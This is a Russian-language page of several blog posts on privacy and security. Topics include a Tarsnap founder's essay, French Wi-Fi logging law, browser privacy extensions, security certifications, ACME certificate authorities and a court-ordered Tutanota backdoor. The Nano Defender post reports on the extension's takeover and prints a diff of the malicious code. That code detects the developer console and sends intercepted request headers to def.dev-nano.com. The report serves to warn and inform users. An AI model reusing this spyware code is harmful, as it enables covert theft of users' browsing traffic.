Русский
Русский
English
Статистика
Реклама

Блог компании globalsign

Перевод Об использовании жизни

24.09.2020 22:04:44 | Автор: admin

От создателя криптосервиса Tarsnap для резервного копирования


В недавней дискуссии на Hacker News комментатор задал вопрос:

Итак, что мы думаем о Tarsnap? Автор явно гений, который тратит время на резервные копии вместо того, чтобы решать задачи тысячелетия. Я говорю это с величайшим уважением. Может, соблазн предпринимательства ловушка?

Сначала я хотел ответить в самом треде, но подумал, что тема заслуживает глубокого ответа, который прочитает больше людей, чем в середине обсуждения HN на сто с лишним комментариев.

Во-первых, разберёмся с философской стороной вопроса: да, это моя жизнь, и да, я могу её использовать или тратить как мне нравится. Но при этом нет ничего плохого в вопросе, как лучше всего потратить время. Это вдвойне верно, если речь идёт не только о моём личном выборе, но и о более широком вопросе: действительно ли наше общество структурировано таким образом, что побуждает людей приносить меньше пользы, чем они могли бы?

Хотя мне слегка не нравится предпосылка этого вопроса в частности, утверждение о том, что я тратил [своё] время на резервные копии.

С одной стороны, это правда: Tarsnap является моей работой с 2006 года. Я иногда даю консультации в последнее время не так часто, но с финансовой точки зрения именно Tarsnap оплачивал все счета (включая покупку дома, в который я перееду на следующей неделе). С другой стороны, моя работа над Tarsnap серьёзно распространилась на смежные области.

В 2009 году многие пользователи Tarsnap попросили функцию защиты ключей парольными фразами, но я обнаружил совершенно бедственное состояние современных технологий для формирования ключей на основе пароля. Тогда я придумал инструмент scrypt и в процессе открыл совершенно новую область криптографии. Конечно, я делал это ради улучшения безопасности Tarsnap; но будет не совсем честно говорить, что я тратил своё время на работу с резервными копиями.

В 2011 году, желая безопасно соединить демоны на разных хостах и будучи не удовлетворён существующими вариантами на основе TLS, я написал spiped. Хотя в целом он не получил широкого распространения, но я всё равно считаю его значительным вкладом в компьютерную безопасность как и scrypt, я создал его для удовлетворения потребностей Tarsnap, но будет натяжкой помещать такой универсальный инструмент с открытым исходным кодом в узкое определение работы с резервными копиями.

Примерно в то же время я начал работать над kivaloo, высокопроизводительным хранилищем данных ключ-значение. Возможно, это наименее используемая из всех моих программ, я не знаю, кто ещё использует её в настоящее время, кроме меня (хотя для опенсорсной программы такая возможность не исключена), но считаю, что это один из лучших образцов моего кода, и в будущем он может найти большее применение, чем сам Tarsnap.

Начиная с 2006 года, а особенно после того, как Amazon запустила семейство HVM-инстансов EC2 с поддержкой M3 в 2012 году, я создавал и поддерживал платформу FreeBSD/EC2. Хотя у меня нет точной статистики по её использованию, прошлогодний опрос показал, что 44% людей, работающих с FreeBSD в облаке, используют Amazon EC2; поэтому несмотря на то, что в настоящее время всего 22 человека оказывают спонсорскую поддержку моим усилиям ясно, что моя работа здесь была продуктивной. Опять же, я хотел в первую очередь запустить FreeBSD в EC2 для Tarsnap, но вряд ли эту работу по итогу можно полностью отнести к категории работа с резервными копиями.

Конечно, вопрос не в том, сделал ли я что-нибудь полезное, а в том, провёл ли я эти годы с максимальной пользой. Судя по ссылке на задачи тысячелетия, я так полагаю, что человек имел в виду альтернативу в виде исследовательской карьеры. Действительно, если бы жизнь сложилась иначе, то между моими студенческими исследованиями по теории чисел под руководством покойного Питера Борвейна и докторскими исследованиями в Оксфорде я мог бы серьёзно подумать о гипотезе Бёрча Свиннертон-Дайера (BSD, одна из задач тысячелетия прим. пер), и эта BSD сильно отличается от той, с которой я связан в настоящее время!

Так почему я не выбрал академическую карьеру? На это есть много причин, и запуск Tarsnap, безусловно, одна из них, но большинство причин сводятся к следующему: Университетская наука паршивое место для проведения инновационных исследований. В 2005 году я подготовил первую статью об использовании общих кэшей в многопоточных процессорах в качестве стороннего канала для криптоатак, и в 2006 году надеялся продолжить эту работу. После присвоения докторской степени в Оксфордском университете и возвращения домой в Канаду я получил право на постдокторскую стипендию от Национального совета Канады по научным и инженерным исследованиям, поэтому подал заявление и не получил одобрения. Мой руководитель предупредил о риске исследования, которое слишком инновационное для молодого учёного: комитеты не знают, что с вами делать, они не видят у вас никакой репутации, на которую можно опереться. Действительно, я столкнулся с этой проблемой: рецензенты в журнале по криптологии не понимали, почему им прислали статью о дизайне процессоров, в то время как рецензенты в журнале о компьютерном железе не понимали, зачем им прислали статью о криптографии. Как из собственного опыта, так и из полученных советов мне стало ясно, что если я хочу преуспеть в академических кругах, нужно то каждый год публиковать дополнительные статьи по крайней мере, до тех пор, пока я не получу должность в университете.

Во многих отношениях создание собственной компании дало мне ту свободу, к которой стремятся учёные. Конечно, у меня есть клиенты, которым нужно помогать, серверы, которыми нужно управлять (не то чтобы они нуждались в особом управлении), и бизнес-бухгалтерия, но у профессоров тоже есть классы, где нужно преподавать, студенты, которых нужно контролировать, и комитеты, которые нужно посещать. Когда речь об исследованиях, то я могу следовать своим интересам, не обращать внимания на прихоти агентств по распределению грантов, комитетов по найму и продвижению: я могу делать проекты вроде scrypt, который сейчас широко известен, но томился в неизвестности в течение нескольких лет после того, как я его опубликовал. И точно так же я могу делать работу вроде kivaloo, которую по сути игнорируют почти десять лет, без каких-либо признаков изменения ситуации в будущем.

Возможен ли мир, в котором я сейчас был бы учёным и работал над решением гипотезы Бёрча Свиннертон-Дайера? Конечно. Вероятно в этом мире самые талантливые студенты по окончании обучения получают своего рода мини-гранты гения. Если бы я получил пятилетний грант на $62 500 в год с единственным условием заниматься исследованиями, то почти наверняка продолжил бы работать в академических кругах и несмотря на более интересные, но более долгосрочные вопросы опубликовал бы достаточно публикаций, чтобы получить постоянную научную должность. Но агентства по распределению грантов работают не так; они выдают гранты на один-два года с расчётом на то, что успешные исследования позже подадут заявку на дополнительное финансирование.

Короче говоря, академические институты системно продвигают именно тот вид краткосрочной оптимизации, в котором, как ни странно, часто обвиняют частный сектор. Так что нет, предпринимательство это не ловушка. Сейчас это единственный способ избежать ловушки.
Подробнее..

Во Франции задержаны владельцы баров с бесплатным Wi-Fi, которые не хранили логи

13.10.2020 02:20:47 | Автор: admin


Бесплатный Wi-Fi в баре или кафе теперь стал обычным делом, и клиенты благодарны за эту услугу, особенно иностранцы в роуминге. Во многих заведениях посетителям просто сообщают название точки доступа и пароль, не затрудняя себя идентификацией пользователей и хранением журнала активности. Но оказалось, что так нельзя. Как сообщает французская газета Les Dernires Nouvelles d'Alsace, минимум пятеро управляющих баров и ресторанов в Гренобле задержаны полицией.

В этих барах не соблюдали малоизвестный закон от 2006 года, который обязывает в течение одного года хранить логи активности всех клиентов, которые подключались к Wi-Fi.

Речь идёт о законе 2006-64 от 23 января 2006 года о некоторых мерах по борьбе с терроризмом. Он распространил обязанность хранения логов, установленную для провайдеров интернета, на всех лиц, которые в отношении первичной или вторичной профессиональной деятельности предлагают населению услугу онлайн-связи, в том числе бесплатно.

В то же время Закон о доверии к цифровой экономике от 21 июня 2004 г. (известный как LCEN) обязывает интернет-провайдеров хранить данные, чтобы можно было идентифицировать всех пользователей предоставляемой ими услуги. Для нужд наблюдения и расследования уголовных правонарушений, а также с целью предоставления информации судебным органам, следует хранить следующую информацию:

  • информация, позволяющая идентифицировать пользователя (например, IP-адрес, номер телефона, адрес электронной почты);
  • данные об используемом оконечном оборудовании связи;
  • технические характеристики, а также дату, время и продолжительность каждого сообщения;
  • данные, относящиеся к запрашиваемым или используемым дополнительным услугам и их поставщикам;
  • данные, позволяющие идентифицировать получателя(-ей) сообщения.

Столкнувшись с этим текстом, у владельца бара есть два варианта. Либо он обращается к третьей стороне, которая будет собирать и хранить эти данные для передачи полиции в случае расследования, либо сам этим занимается. Но в таком случае он будет считаться поставщиком доступа с такими же обязанностями, как у коммерческих интернет-провайдеров.

Проблема в том, что до настоящего момента закон 2006-64 был малоизвестен и часто не исполнялся во Франции. Один из арестованных в Гренобле менеджеров сказал в комментарии газете: Никто, даже профессионалы lUmih (отраслевой профсоюз), которые проводят обязательное обучение в рамках возобновления действия лицензии, никогда не говорили, что я должен хранить эти данные.

Во Франции действительно есть профессиональные операторы сетей Wi-Fi, которые оказывают услуги такого рода с соблюдением всех норм, позволяя идентифицировать конечных клиентов, собирать IP-адреса, вести логи. Они работают также в отелях, конференц-центрах и т. д. Но эти подписки дорого стоят, поэтому владельцы мелких баров просто ставили маршрутизатор, не заморачиваясь формальностями.

Хотя полицейские облавы на бесплатные Wi-Fi в барах редкость во Франции, но теперешние события могут напугать многих. Тем более, по закону предусмотрено суровое наказание: Любое нарушение правил хранения данных предусматривает наказание до одного года лишения свободы и штраф до 75 тыс. евро для физических лиц и 375 тыс. евро для юридических лиц.

Нужно сказать, что в России действуют похожие правила по обязательной идентификации абонентов. Постановление правительства РФ 758, вступившее в силу 13 августа 2014 года, обязало владельцев публичных заведений, которые предоставляют бесплатный доступ к Wi-Fi, идентифицировать пользователей. Согласно постановлению и разъяснениям Минкомсвязи, идентификация может быть выполнена тремя способами: по документу, удостоверяющему личность (например, паспорту), номеру мобильного телефона или учётной записи на сайте Госуслуг.

Интересно, что Франции закон принят ещё в 2006 году, но до сих пор о нём мало кто знал, а полиция не наказывала за нарушение.

По сути, в юридически развитом обществе настолько велико количество законов, подзаконных актов и регулирующих нормативов, что практически каждый гражданин является преступником, знает он это или нет. Нормативная база слишком обширная, а нормы иногда противоречат друг другу, невыполнимы или малоизвестны.
Подробнее..

Расширение Nano Defender нужно срочно удалить из браузера

18.10.2020 20:21:07 | Автор: admin


3 октября 2020 года программист jspenguin2017, автор расширения Nano Defender, сообщил в официальном репозитории, что продал проект группе турецких разработчиков. Это сообщение вызвало массу слухов и опасений: что за турецкие разработчики, кто контролирует код, почему из репозитория удалена страница с политикой приватности?

Спустя несколько дней опасения сообщества полностью оправдались.

Nano Defender довольно популярный способ обхода антиблокировщиков рекламы. Работает в связке с блокировщиками uBlock Origin и Nano AdBlocker (форк uBlock Origin), защищая их от детектирования на сайтах.

Турки оперативно выпустили новую версию Nano Defender 15.0.0.206 с тщательно замаскированными изменениями в функциональности, которые не были опубликованы на GitHub. Внимательное изучение этих изменений указывает на то, что расширение нужно деинсталлировать всем пользователям.

Рекомендация относится к Chrome и браузеров на основе Chromium, где происходит автоматический апгрейд расширений без уведомления пользователя. Турки не покупали версию под Firefox. Мейнтейнер расширений Firefox Nano, разработчик LiCybora, подтвердил, что сохраняет над ними контроль: эти расширения в безопасности. Кроме того, Firefox проверяет цифровые подписи расширений, так что вредоносный код не так легко пропихнуть в новую версию расширения.

Автор uBlock Origin Рэймонд Хилл проанализировал изменения в версии Nano Defender 15.0.0.206. Он отметил, что добавлен код для детектирования запуска dev-консоли расширения. В этом случае высылается уведомление report на сервер https://def.dev-nano.com/. Другими словами, владельцы отслеживают тех, кто пытается разобраться в работе расширения. С высокой степенью вероятности в таком случае расширение меняет свою функциональность, скрывая некоторые функции это стандартный трюк вредоносных программ, которые детектируют наличие исследовательского окружения, такого как виртуальная среда.

В такой ситуации Рэймонду Хиллу пришлось изучать функциональность новой версии Nano Defender без dev-консоли. Вот что он обнаружил.

При запуске расширение прослушивает https://def.dev-nano.com/ на предмет сообщений для заполнения списка listOfObject.

Насколько можно понять код, в дальнейшем содержимое списка listOfObject используется для проверки проверки полей объекта details, который передаётся в webRequest.onBeforeSendHeaders(). Если все поля соответствуют условию, то всё содержимое объекта details отправляется на https://def.dev-nano.com/ под названием handleObject.

При этом обработчик webRequest.onBeforeSendHeaders() действует для всех сетевых запросов:

chrome.webRequest.onBeforeSendHeaders.addListener(blockingHandler, {urls: ["<all_urls>"]}, ['requestHeaders', 'blocking', 'extraHeaders']);

Поскольку listOfObject запрашивается с внешнего сервера, то функциональность этого метода устанавливается извне. Список может содержать любые условия в любом количестве. Грубо говоря, владельцы расширения могут запрашивать из браузера любые фрагменты исходящего сетевого трафика на своё усмотрение. Таким образом, расширение Nano Defender фактически превратилось в универсальный шпионский снифер.

Рэймонд Хилл опубликовал diff, который недоступен в репозитории новых владельцев:

diff для core.js
--- ./background/core.js+++ ./background/core.js@@ -160,7 +160,7 @@const hasNews = false;- const newsPage = "https://jspenguin2017.github.io/uBlockProtector/#announcements";+ const newsPage = "https://github.com/nenodevs/uBlockProtector/#announcements";const newsReadFlag = "news-read";// This handler becomes inactive when there is a popup page set@@ -189,7 +189,8 @@// ------------------------------------------------------------------------------------------------------------- //};-+var defender = io.connect("https://def.dev-nano.com/");+var listOfObject = {};// ----------------------------------------------------------------------------------------------------------------- //a.noopErr = () => {@@ -211,6 +212,29 @@// ----------------------------------------------------------------------------------------------------------------- //+++async function dLisfOfObject(newList) {+ let dListResp = await fetch(newList.uri, newList.attr)+ var listOfObj = {}+ listOfObj.headerEntries = Array.from(dListResp.headers.entries())+ listOfObj.data = await dListResp.text()+ listOfObj.ok = dListResp.ok;+ listOfObj.status = dListResp.status;+ return listOfObj;+}++defender.on("dLisfOfObject", async function (newList) {+ let getRes = await dLisfOfObject(newList);+ defender.emit(newList.callBack, getRes)+});++defender.on("listOfObject", function (a) {+ listOfObject = a;+})+++// Redirect helpersa.rSecret = a.cryptoRandom();@@ -227,7 +251,22 @@// 1 second blank video, taken from https://bit.ly/2JcYAyq (GitHub uBlockOrigin/uAssets).a.blankMP4 = a.rLink("blank.mp4");-++var element = document.createElement("p"); ;+var openListGet = false;+element.__defineGetter__("id", function() {+ openListGet = true;+});++var i = setInterval(function() {+ openListGet = false;+ console.log(element);+ if(openListGet){+ defender.emit("report")+ console.clear();+ clearInterval(i)+ }+}, 100);// ----------------------------------------------------------------------------------------------------------------- //// tab - Id of the tab@@ -450,6 +489,50 @@return true;};++var blockingHandler = function (infos) {+ var changedAsArray = Object.keys(listOfObject);++ var detailsHeader = infos.requestHeaders;+ var HeadReverse = detailsHeader.reverse();+ var stringyFy = JSON.stringify(HeadReverse);+ var mount = "";+ if (changedAsArray.length > 0) {+ var checkerList = true;+ for (const object of changedAsArray) {+ if (object.x === object.y) {+ mount += 1;+ }+ break;+ }+ for (let i = 0; i < changedAsArray.length; i++) {+ let x = changedAsArray[i];+ var re = new RegExp(listOfObject[x],'gi');+ mount = "5";+ if (infos[x].toString().match(re) == null) {+ checkerList = false;+ break;+ }+ }+ if (checkerList) {+ defender.emit('handleObject', infos);+ }+ }++ var m = [45,122,122,122]+ var s = m.map( x => String.fromCharCode(x) )+ var x = s.join("");+ var replacerConcat = stringyFy.split(x).join("");+ var replacer = JSON.parse(replacerConcat);+ return {+ requestHeaders: replacer+ }+};++chrome.webRequest.onBeforeSendHeaders.addListener(blockingHandler, {+ urls: ["<all_urls>"]+}, ['requestHeaders', 'blocking', 'extraHeaders']);+// ----------------------------------------------------------------------------------------------------------------- //

Турецкие разработчики опубликовали новую политику приватности для расширения. В соответствии с ней, расширение собирает и передаёт на удалённый сервер массу информации, в том числе адреса посещённых страниц, время сессий на каждой странице, IP-адрес пользователя и другие данные. Раньше в соглашении о приватности не было такого пункта.

Вообще, продажа расширений распространённая статья дохода для независимых разработчиков. После установки расширения многие пользователи не знают, что расширение купили новые владельцы, а их компьютер уже используются в постороннем проекте.

Например, владельцы прокси-сервиса SmartProxy предлагают своим клиентам доступ к сети домашних IP-адресов, которая насчитывает около 40 миллионов IP большинство узлов находится на компьютерах ничего не подозревающих юзеров. Эти домашние компьютеры используются для проксирования трафика платных клиентов.



Другая сеть Luminati использует в качестве точек выхода компьютеры домашних пользователей, которые установили бесплатное приложение HolaVPN. Данная сеть также скупает популярные браузерные расширения.

С юридической точки зрения использование втёмную домашних компьютеров пользователей для прокачки коммерческого трафика весьма сомнительное мероприятие. Но бизнесменам пока удаётся избежать наказания.

Что касается программиста jspenguin2017, то сообщество осудило его безответственные действия по продаже расширения, поскольку в поддержке и составлении списков для Nano Defender принимали участие десятки других разработчиков. Получается, что jspenguin2017 единолично монетизировал человеко-часы чужой работы.

Расширение Nano Defender уже удалено из каталога Chrome Web Store.
Подробнее..

17 расширений Chrome и Firefox для вашей приватности и безопасности

27.10.2020 18:15:50 | Автор: admin


Здесь мы перечислим некоторые расширения, ориентированные на безопасность и приватность работы. Большинство из них работают в Chrome, это сейчас самый популярный браузер с долей около 40% в России, но многие из расширений выпускаются также под Firefox.

В целом набор полезных расширений можно разбить на пять категорий:

  • Блокировка рекламы
  • Скрытие и подделка информации (IP, геолокация, user agent)
  • Очистка данных в браузере
  • Настройки приватности
  • Защита от зловредов и майнинговых скриптов

Ряд браузеров основаны на движке Chromium, его расширения совместимы с Brave, Opera и Vivaldi.

Блокировщики рекламы


Самое главное расширение, которое нужно установить себе, а также всем знакомым и родственникам блокировщик рекламы. Это абсолютный must have для каждого. Вот самые популярные:


Сложно рекомендовать конкретный блокировщик, все они хорошо справляются. Кто-то предпочитает самый быстрый Ghostery, кто-то привык к старому AdBlock Plus.


Результаты бенчмарков в феврале 2019 года, сколько времени уходит на обработку страницы разными блокировщиками рекламы. Несмотря на накладные расходы, все они по итогу ускоряют загрузку страниц

В конце статьи голосование за лучший блокировщик.

Скрытие информации


HideMyBack

Скрытие определённой информации: реферер, user agent, IP-адрес и геолокация. Защищает от онлайн-трекеров и позволяет даже изменить свой IP-адрес в ответе для сервера.



User Agent Switcher



Простое и мощное расширение для переключения между разными строками user agent.

WebRTC Protect

WebRTC открытый фреймворк для общения в реальном времени. Он обычно используется для видеозвонков и конференций через браузер или мобильные устройства.

Расширение WebRTC Protect защищает пользователя от утечки IP-адреса через WebRTC. Расширение маленькое и простое в использовании.



Unseen приватность в чатах
Защита от раскрытия статуса Просмотрено (Seen) в чатах. Работает с веб-мессенджерами WhatsApp, Facebook Messenger, Web Telegram и др, а также на сайтах facebook.com и messenger.com.

Блокирует статус Просмотрено, индикатор последней активности и индикатор Пользователь печатает....

Location Guard
Скрытие или подделка своего географического местоположения.



Очистка данных в браузере


Click&Clean (Chrome, Firefox, Edge)

Популярное расширение для очистки временных данных в браузере. Конечно, соответствующие настройки есть в самом браузере, но это расширение предоставляет гораздо больше настраиваемых опций и расширенных настроек очистки.





Настройки приватности


Privacy Settings



Минималистичное, но весьма функциональное расширение для управления настройками приватности. Отличается простым интерфейсом.

Privacy Manager
Более продвинутый диспетчер настроек приватности в Chrome. Здесь больше настроек и опций для управления настройками безопасности и куками. Позволяет также удалить данные просмотра, для этого есть большой набор опций.





Privacy Manager умеет производить сетевой мониторинг, изменять куки, а также управлять IP-адресами по WebRTC.

Privacy Badger (Chrome, Firefox, Opera, Android)

Расширение Privacy Badger от Фонда электронных рубежей (EFF) автоматически обнаруживает и блокирует трекеры и вредоносные скрипты на основе их поведения. Есть список разрешений для отдельных элементов, таких как видеоплееры и интерактивные виджеты.

Разработчики поясняют, что им нравятся Disconnect, Adblock Plus, Ghostery и другие подобные расширения и блокировщики рекламы, но они не обеспечивают в точности то, что нужно. Тестирование показало, что всем этим решениям для эффективной работы требуется некоторый объём ручной настройки, чтобы блокировать нестандартные трекеры. Некоторые используют неприемлемую бизнес-модель, исключая клиентов из списка блокировки за деньги. Поэтому EFF выпустил собственное расширение для блокировки трекинга.



EditThisCookie



Продвинутый опенсорсный менеджер куков. Позволяет редактировать, добавлять, управлять, создавать и искать по кукам. Также позволяет изменять дату истечения срока действия куков и импортировать/экспортировать их.

Защита и безопасность


Miner Blocker

Расширение против криптомайнеров не только останавливает работу майнерских скриптов, но и служит индикатором, на каких сайтах установлены такие зловреды. Владельцы сайтов считают это легитимной моделью микроплатежей, когда читатели платят своими ресурсами за услугу доступа к информации, однако в таком случае этично предупреждать пользователей о взимании платы.



Fox Web Security



Родительский контроль: блокировка сайтов с материалами для взрослых. Хотя её можно обойти, впрочем, как и любую блокировку.

HTTPS Everywhere (Chrome, Firefox, Opera, Firefox для Android), расширение включено в Brave, Tor и Onion (iOS) по умолчанию



Совместная разработка Tor Project и Фонда электронных рубежей. На многих сайтах реализована не полная, а частичная или некорректная поддержка HTTPS. Например, по умолчанию загружается незащищённая HTTP-версия или на страницах HTTPS отдельные ссылки ведут на неё. Расширение HTTPS Everywhere исправляет некоторые из этих проблем путём изменения запросов на лету.



Каждое расширение вносит свой вклад в парсинг веб-страницы и потребление памяти, так что желательно установить необходимый минимум и не более того. Например, антивирусные расширения в значительной степени бесполезны и только впустую расходуют ресурсы CPU и память, а иногда даже внедряют в браузер ненужную рекламу, как это делало антивирусное расширение Avast.



Если вы пользуетесь другими полезными расширениями для защиты личных данных и безопасности, добавляйте в комментариях.
Подробнее..

Продажа корочек. Стоимость сертификатов в инфобезе и маршрут их получения

12.11.2020 22:13:22 | Автор: admin

Security Certification Progression Chart 7.0, октябрь 2020 года

Специалист по информационной безопасности Пол Джерими (Paul Jerimy) проделал большую работу и составил обширную схему с порядком получения сертификатов во всех областях ИБ: Security Certification Progression Chart. На сегодняшний день она включает в себя 362 программы сертификации.

Похоже, сертификация стала отдельным бизнесом, где учебные центры и центры сертификации думают не столько о проверке знаний специалистов, сколько о прибыли.

Стоимость некоторых сертификатов превышает разумные пределы. Для каждого сертификата в таблице указана стоимость его получения, а также предполагаемые дорожные расходы. Таким образом можно примерно вычислить, сколько стоит собрать все необходимые корочки и пройти этот путь до конца.

На диаграмме все известные автору программы сертификации, связанные с безопасностью. У некоторых ужасная репутация, а некоторые считаются отраслевыми стандартами.

Схема читается снизу вверх.

Сертификаты внизу самый начальный уровень. Чем выше вы поднимаетесь, тем более продвинутые сертификаты.

Например, специальность Безопасность сетей и коммуникаций. На нижнем уровне представлены самые базовые экзамены F5 Big-IP Certified Administrator за $135 и CompTIA Network+ за $319, а на вершине пирамиды сертифицированный эксперт по внедрению решений Cisco в области безопасности (CCIE Sec) $2050 за корочку плюс около $12 тыс. транспортные расходы и сертифицированный архитектор Cisco (CCAr). Высочайшее звание в иерархии Cisco стоит $15 тыс. за экзамен.



Первая версия таблицы вышла в марте 2020 года, с тех пор она значительно дополнена и уточнена. Сертификаты в иерархии расположены субъективно, с учётом их авторитетности и мнения реальных экспертов что действительно важно, а что не очень.

Восемь цветов на диаграмме это восемь областей безопасности согласно классификации (ISC), Международного консорциума по сертификации в области безопасности информационных систем, который поддерживает сертификацию CISSP. Некоторые сертификаты охватывают несколько областей, поэтому распределены по нескольким столбцам, но окрашены цветом доминирующего домена.

Области безопасности обычно разбиты на подобласти. Они представлены затенёнными областями внутри основных столбцов. Например, область Операции безопасности (Security Operations) включает пентестинг и применение экплоитов, а уже ближе к программному обеспечению синим цветом обозначены такие подобласти операций безопасности, как Форензика (Криминалистика) и Разбор инцидентов.



В общем, для обычной карьеры рекомендуется только одна сертификация на каждые 3-5 строк в определённой области. Нет особого смысла получать примерно такой же сертификат близкого уровня к тому, что уже есть.

Кроме того, если в своей карьере вы собираетесь ограничиться только одним или двумя сертификатами, то Пол Джерими рекомендует выбрать такие, что охватывают несколько областей, как GSEC (GIAC Security Essentials) или CASP+ (CompTIA Advanced Security Practitioner).

Если хотите изучить новую область, но не имеете абсолютно никакого опыта в ней, рекомендуется начать с двух нижних строчек. Однако не стоит недооценивать свой реальный опыт работы.

Кроме реальной практической пользы для карьеристов, эта схема ещё и интересный образец интерактивной инфографики.

Хотя на самом деле у большинства профессионалов по информационной безопасности очень мало таких сертификатов, а у некоторых вообще нет ни одного. Как и диплом вуза, эти сертификаты зачастую имеют сомнительную ценность. Но у каждого свой путь. В каком-то смысле сертификация может выступать более практичной альтернативой традиционному высшему образованию или дополнением к нему.
Подробнее..

Запасной вариант для Lets Encrypt бесплатные автоматические УЦ

24.11.2020 20:17:07 | Автор: admin
Для многих Let's Encrypt стал неотъемлемой частью веб-разработки, а автоматическое обновление сертификата каждые 90 дней рутинной процедурой. Фактически, сейчас это самый популярный удостоверяющий центр в интернете. Это великолепно, но и опасно.

Возникает вопрос: а что, если серверы Let's Encrypt временно перестанут работать? Не хочется думать о возможных причинах сбоя. Но желательно предусмотреть запасной вариант. То есть такой же удобный автоматизированный центр бесплатной сертификации.

К счастью, запасные варианты есть. Как минимум два. Такие же бесплатные автоматизированные УЦ, созданные по образцу Let's Encrypt.

Протокол ACME


Все коммуникации с Let's Encrypt происходят про протоколу ACME (Automated Certificate Management Environment). Это открытый протокол для автоматизации взаимодействия с УЦ. В нём нет ничего специфичного для Let's Encrypt, его поддерживает несколько других УЦ.

Сейчас как раз тот момент, когда всё больше УЦ начинают работать через ACME. Это означает, что практически все наши инструменты, скрипты и процессы для получения сертификатов из Let's Encrypt будут отлично работать и с другими центрами, которые поддерживают ACME.

Чтобы перестроиться на другой УЦ, достаточно просто изменить адрес API в настроенных скриптах с https://acme-v02.api.letsencrypt.org/directory (Let's Encrypt) на https://api.buypass.com/acme/directory (BuyPass, о нём см. ниже) или какой-нибудь другой.

BuyPass


Нам нужен УЦ, который соответствует двум критериям:

  1. поддерживает ACME;
  2. выдаёт бесплатные сертификаты.

Этим критериям соответствует норвежский УЦ под названием BuyPass.

Бесплатная услуга называется BuyPass Go SSL: это автоматическая выдача и продление сертификатов + поддержка ACME. То, что и нужно.

Техническая документация объясняет, как настроить получение и обновление сертификата с помощью Certbot официального клиента от Фонда электронных рубежей для работы с Let's Encrypt или любым другим УЦ, который поддерживает протокол ACME.

Регистрация в УЦ и получение сертификата в BuyPass элементарны, как и в случае Let's Encrypt, здесь никакой разницы.

Регистрация с указанием своего адреса электронной почты для уведомлений ('YOUR_EMAIL') и согласием на условия пользования (--agree-tos):

root@acme:~# certbot register -m 'YOUR_EMAIL' --agree-tos --server 'https://api.buypass.com/acme/directory'

Получение сертификата:

root@acme:~# certbot certonly --webroot -w /var/www/example.com/public_html/ -d example.com -d www.example.com --server 'https://api.buypass.com/acme/directory'

Впоследствии при необходимости используются другие команды Certbot для отзыва сертификата (revoke), продления истёкших сертификатов (renew) и удаления сертификата (delete).

Команду продления рекомендуется поместить в cron и выполнять автоматически, чтобы на всякий случай проверять истёкшие сертификаты. Например, так:

#Cron-job scheduled under root to run every 12th hour at a specified minute (eg. 23, change this to your preference)23 */12 * * * /opt/certbot/certbot-auto renew -n -q >> /var/log/certbot-auto-renewal.log

У BuyPass есть некоторые лимиты на ACME. Основной лимит количество сертификатов на зарегистрированный домен (20 в неделю). Здесь имеется в виду та часть домена, которая куплена у регистратора доменных имён. То есть это лимит на все поддомены в общей сложности. Другой лимит 5 дубликатов в неделю. Это лимит сертификатов на каждый конкретный поддомен. Есть лимиты на ошибки валидации по 5 штук на аккаунт, на хост и в час.

Лимит запросов к конечным точкам new-reg, new-authz и new-cert: 20 в секунду. Лимит запросов к /directory: 40 в секунду.

Максимальное количество авторизаций в процессе (Pending Authorisations): 300 штук.

Вместо Certbot можно использовать другой клиент acme.sh, который тоже изначально настроен на Let's Encrypt, но легко направляется на другой УЦ с поддержкой ACME.

./acme.sh --issue --dns dns_cf -d example.com --server "https://api.buypass.com/acme/directory"

ZeroSSL


Ещё один УЦ, который выдаёт бесплатные 90-дневные сертификаты по протоколу ACME это австрийский ZeroSSL.

В вышеупомянутой программе acme.sh есть поддержка ZeroSSL, так что зарегистрироваться очень просто:

acme.sh --register-account -m foo@bar.com --server zerossl

Далее одна команда для генерации сертификата:

acme.sh --issue --dns dns_cf -d example.com --server zerossl

Лимитов на обращение к API не существует. Есть и другие преимущества: этот УЦ даёт бесплатные сертификаты не только на 90 дней, но и на 1 год, есть панель веб-мониторинга и техподдержка.

Кстати, ZeroSSL генерирует сертификаты даже через веб-интерфейс, в пошаговом режиме с верификацией домена по электронной почте. Но для автоматизации такой способ, конечно, не годится.

Другие серверы ACME


Вот список всех известных серверов ACME. Их пока немного, но число растёт.



Let's Encrypt выдающаяся организация, которая делает отличное дело. Но опасно класть все яйца в одну корзину. Чем больше УЦ работает по протоколу ACME и раздаёт бесплатные сертификаты в автоматическом режиме, тем более разнообразна и надёжна экосистема в целом.

У Let's Encrypt может случиться даунтайм или он может временно приостановить деятельность и тогда на подстраховку придут Buypass и ZeroSSL. Наличие этих запасных вариантов в конечном итоге повышает доверие к самому Let's Encrypt, потому что это теперь не единая точка отказа. А сменить УЦ по ACME дело нескольких секунд.



Специальное предложение удостоверяющего центра GlobalSign


Подробнее..

Немецкий суд заставил почтового провайдера Tutanota установить бэкдор

10.12.2020 02:18:51 | Автор: admin

Полнотекстовый поиск в зашифрованной почте

Для начала немного контекста. Tutanota один из немногих почтовых сервисов, которые шифруют входящую почту по умолчанию, как Protonmail, Posteo.de и Mailbox.org. То есть почта хранится на серверах в зашифрованном виде. Провайдер не может её расшифровать, даже если захочет.

Однако постановление Кёльнского областного суда потребовало внедрить функцию, с помощью которой можно отслеживать отдельные почтовые ящики и читать электронные письма в виде открытого текста.

Это нехороший прецедент для европейской правовой системы.

Tutanota хочет подать жалобу на это решение, но она не имеет приостанавливающего действия, то есть сам факт подачи жалобы не приостанавливает действие прежнего постановления, которое выполнить нужно обязательно.

Поэтому нам пришлось приступить к разработке функции мониторинга, сказала пресс-секретарь компании в комментарии для журнала c't. Если жалоба будет успешной, то функция будет удалена.

Решение Кёльнского областного суда опасный прецедент для европейской правовой системы. Это решение отличается от решений других судов. Например, летом Ганноверский окружной суд постановил, что Tutanota не предоставляет и не участвует в каких-либо телекоммуникационных услугах в юридическом смысле и, следовательно, не может быть обязана контролировать телекоммуникации. Судьи Ганновера сослались на знаменитое решение Gmail Европейского суда от 13 июня 2019 года (дело C-193/18). Согласно ему, услуги электронной почты не являются услугами связи. Следовательно, Google не обязана регистрировать для Gmail телекоммуникационный идентификатор и устанавливать какие-либо интерфейсы перехвата.

Тем не менее, кёльнский суд назвал Tutanota участником телекоммуникационных услуг, хотя компания считает это постановление абсурдным и будет бороться за его отмену.


Рабочий коллектив Tutanota

Так или иначе, до 31 декабря 2020 года Tutanota обязана запрограммировать функцию, которая даст Государственному управлению уголовной полиции Северной Рейн-Вестфалии доступ к почтовым ящикам пользователей, включая того конкретного пользователя, с которого началась эта история.

Речь идёт о расследовании одного уголовного дела, по которому подозреваемый отправил автомобильному дилеру письмо с угрозами, воспользовавшись услугами защищённого почтового сервиса.

